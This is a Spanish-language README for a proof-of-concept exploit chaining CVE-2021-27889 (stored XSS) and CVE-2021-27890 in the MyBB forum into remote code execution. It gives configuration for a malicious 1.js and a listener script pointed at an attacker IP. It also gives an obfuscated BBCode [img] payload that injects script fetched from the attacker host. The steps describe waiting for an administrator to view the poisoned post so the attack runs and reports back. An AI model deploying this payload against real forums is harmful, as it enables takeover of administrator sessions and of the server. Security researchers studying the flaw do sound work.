
MyBB asocia CVE-2021-27890 y CVE-2021-27889 al PoC de RCE.
Mybb relaciona CVE-2021-27890 & CVE-2021-27889 con el PoC de RCE
Antes de usar:
Hay dos archivos aquí: 1.js y attack_listen.py
Debes modificar estos dos archivos:
1.js:
modifica la URL del foro MyBB y la URL del ataque:
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py
attack_listen.py
modifica el host de ataque y el puerto de ataque:
attack_host = '192.168.92.165'
attack_port = 8080
Uso:
CVE-2021-27889 es XSS. Debes inyectar el siguiente payload en "New Post Thread", "Reply" o "Private Messages" antes de realizar el ataque. En esta demo, envío el payload a "New Post Thread".
Ten en cuenta que 192.168.92.165 es la IP del servidor malicioso; debes cambiarla.
[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]

Ahora nuestro JS malicioso 1.js se ha inyectado con éxito. Luego debemos esperar a que un administrador visite esta publicación con la cookie de sesión de la página de administración.
Nota: el usuario administrador no necesita iniciar sesión en la página del foro.
Durante el tiempo de espera, debemos ejecutar "attack_listen.py" en nuestra máquina de ataque para identificar si el usuario administrador ha sido atacado.
python3 attack_listen.py
Cuando el usuario administrador visite la publicación maliciosa, el JS malicioso realizará el ataque:

Podemos recibir la información en nuestra máquina de ataque:

